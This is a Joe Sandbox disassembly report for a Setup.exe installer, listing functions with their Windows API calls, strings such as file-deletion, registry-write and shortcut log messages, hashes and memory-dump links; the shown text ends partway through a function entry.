Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
Delete: DeleteFile("%s"), xrefs: 00406DBC

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
PSAPI.DLL, xrefs: 00406464
Process32NextW, xrefs: 004065C8
Process32FirstW, xrefs: 004065BD
EnumProcesses, xrefs: 00406482
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32NextW, xrefs: 004065DE
Module32FirstW, xrefs: 004065D3
Unknown, xrefs: 004064FC
GetModuleBaseNameW, xrefs: 00406494
Kernel32.DLL, xrefs: 0040659B

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
@%F, xrefs: 004042A7
open, xrefs: 004042DF

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8
%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060763418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.2060435619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060401553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060464299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060500258.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
